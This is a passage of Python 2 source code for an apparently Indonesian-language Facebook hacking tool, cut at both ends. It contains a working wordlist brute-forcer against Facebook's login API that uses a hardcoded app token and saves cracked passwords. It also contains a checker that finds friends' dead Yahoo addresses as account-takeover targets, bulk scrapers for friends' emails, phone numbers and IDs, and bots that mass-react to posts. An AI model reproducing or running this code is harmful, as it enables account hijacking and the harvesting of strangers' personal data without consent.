print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mJumlah\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mMencoba \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mIngin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Dari teman facebook'
print '\x1b[1;37;40m2. Gunakan File'
print '\x1b[1;31;40m0. Kembali'
print
yahoo_pilih()
def yahoo_pilih():
go = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Jangan kosong'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak ada'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(teman.text)
save = open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Ambil ID teman'
print '\x1b[1;37;40m2. Ambil ID teman dari teman'
print '\x1b[1;37;40m3. Ambil ID member GRUP'
print '\x1b[1;37;40m4. Ambil Email teman'
print '\x1b[1;37;40m5. Ambil Email teman dari teman'
print '\x1b[1;37;40m6. Ambil No HP teman'
print '\x1b[1;37;40m7. Ambil No HP teman dari teman'
print '\x1b[1;31;40m0. Kembali'
print
grab_pilih()
def grab_pilih():
cuih = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Jangan kosong'
grab_pilih()
else:
if cuih == '1':
id_teman()
else:
if cuih == '2':
idfrom_teman()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_teman()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_teman()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mTidak ada'
grab_pilih()
def id_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def idfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def emailfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(emfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def hpfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hpfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Bot Reactions Target Post'
print '\x1b[1;37;40m2. Bot Reactions Grup Post'
print '\x1b[1;37;40m3. Bot Komen Target Post'
print '\x1b[1;37;40m4. Bot Komen Grup Post'
print '\x1b[1;37;40m5. Mass delete Post'
print '\x1b[1;37;40m6. Terima permintaan pertemanan'
print '\x1b[1;37;40m7. Hapus pertemanan'
print '\x1b[1;31;40m0. Kembali'
print
bot_pilih()
def bot_pilih():
bots = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Jangan kosong'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mTidak ada'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Kembali'
print
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
